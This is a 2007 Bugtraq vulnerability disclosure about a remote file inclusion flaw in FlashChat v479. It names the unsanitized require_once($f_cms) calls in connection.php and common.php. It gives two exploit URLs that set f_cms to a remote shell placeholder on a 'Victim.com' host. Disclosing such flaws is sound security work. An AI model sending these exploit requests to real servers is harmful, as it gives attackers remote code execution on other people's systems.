
Date: 28 May 2007 16:36:52 -0000
From: Raed@...Mail.Com
To: bugtraq@...urityfocus.com
Subject: RFI In Script FlashChat_v479

Discovered By Hasadya Raed
Contact : RaeD@...Mail.Com
--------------------------
Script : FlashChat_v479
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files : 
connection.php >Require_once($f_cms); 
common.php > Require_once($f_cms); 
--------------------------
Exploits : 
http://www.Victim.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.Victim.com/chat/inc/common.php?f_cms=[Shell-Attack]
